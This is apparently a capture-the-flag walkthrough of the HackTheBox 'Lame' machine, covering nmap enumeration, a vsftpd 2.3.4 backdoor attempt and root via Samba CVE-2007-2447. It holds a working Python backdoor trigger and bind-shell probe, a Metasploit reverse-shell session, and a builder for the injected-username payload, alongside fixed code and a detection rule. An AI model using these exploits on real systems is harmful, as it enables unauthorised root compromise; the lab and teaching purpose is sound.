HTB - Lame

In this walkthrough, we will go through the Lame machine from HackTheBox. It is rated Easy on the platform and consists of exploiting a vulnerable Samba version to get root directly, with no separate privilege escalation step. So, let’s get started without any delay.

Machine Info:

Title: Lame
IP address: 10.10.10.3
Difficulty: Easy
OS: Linux
Description: Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Enumeration:

  • I started off with an nmap scan on the target IP with the aggressive flag set (-A enables version detection, OS detection, default NSE scripts and traceroute) and found 4 open ports: 21 (FTP), 22 (SSH), and 139 and 445 (Samba). Note that the SMB host scripts errored out, so the exact Samba version does not appear in this output.

$ sudo nmap -A 10.10.10.3

Nmap scan report for 10.10.10.3
Host is up (0.25s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
| vulners: 
|   cpe:/a:vsftpd:vsftpd:2.3.4: 
|     	PRION:CVE-2011-2523	10.0	https://vulners.com/prion/PRION:CVE-2011-2523
|     	EDB-ID:49757	10.0	https://vulners.com/exploitdb/EDB-ID:49757	*EXPLOIT*
|_    	1337DAY-ID-36095	10.0	https://vulners.com/zdt/1337DAY-ID-36095	*EXPLOIT*
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
| vulners: 
|   cpe:/a:openbsd:openssh:4.7p1: 
|     	SSV:78173	7.8	https://vulners.com/seebug/SSV:78173	*EXPLOIT*
|     	SSV:69983	7.8	https://vulners.com/seebug/SSV:69983	*EXPLOIT*
|     	EDB-ID:24450	7.8	https://vulners.com/exploitdb/EDB-ID:24450	*EXPLOIT*
|     	EDB-ID:15215	7.8	https://vulners.com/exploitdb/EDB-ID:15215	*EXPLOIT*
|     	SECURITYVULNS:VULN:8166	7.5	https://vulners.com/securityvulns/SECURITYVULNS:VULN:8166
|     	PRION:CVE-2010-4478	7.5	https://vulners.com/prion/PRION:CVE-2010-4478
|     	SSV:20512	7.2	https://vulners.com/seebug/SSV:20512	*EXPLOIT*
|     	PRION:CVE-2011-1013	7.2	https://vulners.com/prion/PRION:CVE-2011-1013
|     	PRION:CVE-2008-1657	6.5	https://vulners.com/prion/PRION:CVE-2008-1657
|     	CVE-2008-1657	6.5	https://vulners.com/cve/CVE-2008-1657
|     	SSV:60656	5.0	https://vulners.com/seebug/SSV:60656	*EXPLOIT*
|     	PRION:CVE-2011-2168	5.0	https://vulners.com/prion/PRION:CVE-2011-2168
|     	PRION:CVE-2010-5107	5.0	https://vulners.com/prion/PRION:CVE-2010-5107
|     	CVE-2010-5107	5.0	https://vulners.com/cve/CVE-2010-5107
|     	PRION:CVE-2010-4755	4.0	https://vulners.com/prion/PRION:CVE-2010-4755
|     	PRION:CVE-2010-4754	4.0	https://vulners.com/prion/PRION:CVE-2010-4754
|     	PRION:CVE-2012-0814	3.5	https://vulners.com/prion/PRION:CVE-2012-0814
|     	PRION:CVE-2011-5000	3.5	https://vulners.com/prion/PRION:CVE-2011-5000
|     	CVE-2011-5000	3.5	https://vulners.com/cve/CVE-2011-5000
|     	CVE-2008-5161	2.6	https://vulners.com/cve/CVE-2008-5161
|     	PRION:CVE-2011-4327	2.1	https://vulners.com/prion/PRION:CVE-2011-4327
|     	CVE-2011-4327	2.1	https://vulners.com/cve/CVE-2011-4327
|     	PRION:CVE-2008-3259	1.2	https://vulners.com/prion/PRION:CVE-2008-3259
|     	CVE-2008-3259	1.2	https://vulners.com/cve/CVE-2008-3259
|_    	SECURITYVULNS:VULN:9455	0.0	https://vulners.com/securityvulns/SECURITYVULNS:VULN:9455
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: broadband router|remote management|WAP|printer|general purpose|power-device
Running (JUST GUESSING): Arris embedded (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Linux 2.4.X|2.6.X (92%), Dell iDRAC 6 (92%), Raritan embedded (92%)
OS CPE: cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware
Aggressive OS guesses: Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Raritan Dominion PX DPXR20-20L power control unit (92%), LifeSize video conferencing system (Linux 2.4.21) (92%), DD-WRT v24-sp1 (Linux 2.4.36) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   248.70 ms 10.10.14.1
2   250.07 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.65 seconds

  • I looked up the vsftpd version in searchsploit for known exploits and found the famous 2.3.4 backdoor (CVE-2011-2523, which the vulners script above had already flagged); it also has a Metasploit module.

searchsploit vsftpd 2.3.4

Exploitation:

  • Next, I ran the Metasploit module for that backdoor (exploit/unix/ftp/vsftpd_234_backdoor) against the target, but it failed:

Exploit completed but no session created

The module works in two stages: it logs in with a username containing “:)” to trigger the backdoor, then connects to the bind shell the backdoored daemon opens on TCP/6200. Nothing in the first stage reports failure, so this message means the second connection never succeeded. Given that nmap already showed the host filtering most ports, port 6200 simply not being reachable from the attacker’s side is the likely cause, and it is worth checking that port by hand before moving on.
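To make the two stages explicit, here is a small Python reproduction of what the Metasploit module does, added to this write-up (it is not the author’s code and not the Metasploit module): stage 1 sends the “:)” login, stage 2 tries to reach the shell on TCP/6200. Because the second connection is the only part that can fail silently, the script reports each stage separately. The FakeVsftpd class is a constructed stand-in so the exchange can be run offline on loopback; the target 10.10.10.3 and port 6200 come from the write-up and the real backdoor, while the function names and the fake server are assumptions for illustration.

```python
import socket
import threading

SMILEY = b":)"          # the byte pair a backdoored vsftpd 2.3.4 looks for in USER


def trigger_backdoor(host, ftp_port=21, timeout=5.0):
    """Stage 1: the USER/PASS exchange that trips the vsftpd 2.3.4 backdoor.

    A backdoored build scans the USER argument for ':)' and, if present, starts
    a listener on TCP/6200 that hands out a shell. Returns the banner so the
    caller can confirm it was really talking to vsFTPd."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as s:
        banner = s.recv(1024)
        s.sendall(b"USER anon" + SMILEY + b"\r\n")
        s.recv(1024)                         # 331 Please specify the password.
        s.sendall(b"PASS whatever\r\n")
        # A triggered daemon may never answer the PASS; wait briefly so the
        # listener has time to come up before stage 2 probes it.
        s.settimeout(1.0)
        try:
            s.recv(1024)
        except socket.timeout:
            pass
    return banner


def probe_shell(host, shell_port=6200, timeout=5.0):
    """Stage 2: connect to the bind shell and run `id`.

    Returns the command output, or None when the port is closed or filtered.
    None is the situation behind Metasploit's 'Exploit completed but no session
    created': stage 1 may well have fired, but 6200 never became reachable."""
    try:
        with socket.create_connection((host, shell_port), timeout=timeout) as s:
            s.sendall(b"id\n")
            return s.recv(4096).decode(errors="replace").strip()
    except OSError:                          # ConnectionRefused, timeout, ...
        return None


class FakeVsftpd(threading.Thread):
    """Constructed stand-in for a backdoored vsftpd so both stages can run
    offline. It listens on an ephemeral port and, only after a ':)' login,
    starts listening on a second ephemeral port that answers `id` with a
    canned root line. This is not real vsftpd code."""

    def __init__(self):
        super().__init__(daemon=True)
        self.ftp = socket.socket()
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(1)
        self.shell = socket.socket()
        self.shell.bind(("127.0.0.1", 0))    # bound but NOT listening yet
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]

    def run(self):
        conn, _ = self.ftp.accept()
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user = conn.recv(1024)
            conn.sendall(b"331 Please specify the password.\r\n")
            conn.recv(1024)                  # PASS line; the backdoor ignores it
            if SMILEY not in user:
                conn.sendall(b"530 Login incorrect.\r\n")
                return
            self.shell.listen(1)             # the "backdoor" comes up now
            sh, _ = self.shell.accept()
            with sh:
                sh.recv(1024)                # "id\n"
                sh.sendall(b"uid=0(root) gid=0(root)\n")
        self.ftp.close()
        self.shell.close()


def run_offline_demo():
    """Runs both stages against the fake server and reports what each saw."""
    srv = FakeVsftpd()
    before = probe_shell("127.0.0.1", srv.shell_port, timeout=1.0)   # refused
    srv.start()
    banner = trigger_backdoor("127.0.0.1", srv.ftp_port)
    after = probe_shell("127.0.0.1", srv.shell_port, timeout=2.0)
    srv.join(timeout=3.0)
    return {"banner": banner, "before": before, "after": after}


if __name__ == "__main__":
    print(run_offline_demo())
    # Against the real target the two calls are simply:
    #   trigger_backdoor("10.10.10.3"); print(probe_shell("10.10.10.3"))
```

On Lame, the second call is the one that returns None: the login is accepted, but nothing ever answers on 6200, which is exactly the symptom Metasploit condenses into one line.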

  • At this point I fell into a rabbit hole and enumerated very deeply without finding any other low-hanging fruit for initial access. Nmap had only reported the Samba service as “3.X - 4.X” (its smb-os-discovery script errored out), so I checked the Samba version directly: it is 3.0.20, which is vulnerable to CVE-2007-2447. That bug is a command injection in Samba’s “username map script” option: the client-supplied username is passed through a shell when the mapping script is invoked. The script runs during authentication, so no valid credentials are needed, and because smbd runs as root the injected command runs as root too. I used the Metasploit module for this CVE and got a root shell straight away.

$ msfconsole -q
[*] Starting persistent handler(s)...

msf6 > search  CVE-2007-2447

msf6 > use 0
msf6 exploit(multi/samba/usermap_script) > set LHOST  10.10.14.2 
LHOST => 10.10.14.2
msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] Command shell session 1 opened (10.10.14.2:4444 -> 10.10.10.3:35378) at 2023-12-01 12:56:19 +0530

id
uid=0(root) gid=0(root)
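The root cause behind that one-shot root shell is easiest to see in code. The following Python example is added here and is neither Samba’s source nor the Metasploit module: it builds the username the public CVE-2007-2447 exploits send at session setup, shows a vulnerable dispatch that mimics how Samba 3.0.20 handed the username to /bin/sh, and puts the hardened dispatch beside it. /bin/echo stands in for the administrator’s map script, and the function names are assumptions for illustration; the nohup-in-backticks shape of the username is the one the exploit uses.

```python
import subprocess

# Stands in for the administrator-configured 'username map script'. Samba ran
# it with the client-supplied name as its argument; /bin/echo just makes the
# effect visible here.
MAP_SCRIPT = "/bin/echo"


def injected_username(cmd, detach=True):
    """Builds the username the public CVE-2007-2447 exploits send at session
    setup. The command sits inside backticks; the '/=' before them is inert.
    The nohup prefix keeps the spawned command alive after smbd closes the
    pipe; detach=False drops it, which is handy for offline tests."""
    inner = f"nohup {cmd}" if detach else cmd
    return f"/=`{inner}`"


def map_user_vulnerable(username):
    """Samba 3.0.20 - 3.0.25rc3 behaviour: the script and the raw username are
    joined into one command line and handed to /bin/sh -c, so the shell
    expands the backticks and runs the attacker's command (as root, because
    smbd runs as root). This is the bug; do not write code like this."""
    proc = subprocess.run(f"{MAP_SCRIPT} {username}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def map_user_fixed(username):
    """Hardened form: exec the script directly with the username as a single
    argv element. No shell is involved, so backticks, semicolons and quotes are
    just bytes in an argument. (Samba's own fix escaped the string before it
    reached the shell; avoiding the shell entirely is the cleaner route when
    you control the code.)"""
    proc = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return proc.stdout.strip()


def has_shell_metachars(username):
    """Cheap detection rule: a legitimate account name never contains these,
    so their presence in a session-setup username is itself an indicator
    worth logging, whether or not the server is patched."""
    return any(c in username for c in "`$;|&<>(){}\n")


if __name__ == "__main__":
    u = injected_username("id")
    print("payload username:      ", u)
    print("vulnerable path prints:", repr(map_user_vulnerable(u)))  # id ran
    print("fixed path prints:     ", repr(map_user_fixed(u)))       # literal text
    print("flagged:", has_shell_metachars(u))
```

Run as-is, the vulnerable path prints the output of id glued onto “/=”, while the fixed path prints the username back verbatim; the only difference between the two functions is whether a shell ever sees the attacker-controlled string.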

Getting Flags:

  • Captured the user and root flags and completed the machine. Since the shell is already root, no separate privilege escalation is needed for the root flag.

Conclusion:

So that was “Lame” for you. We started off with a regular nmap aggressive scan and found Samba 3.0.20 running on the target. Checked Metasploit for a known exploit (CVE-2007-2447, command injection through the “username map script” option) and found one. Fired it at the target and got root. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
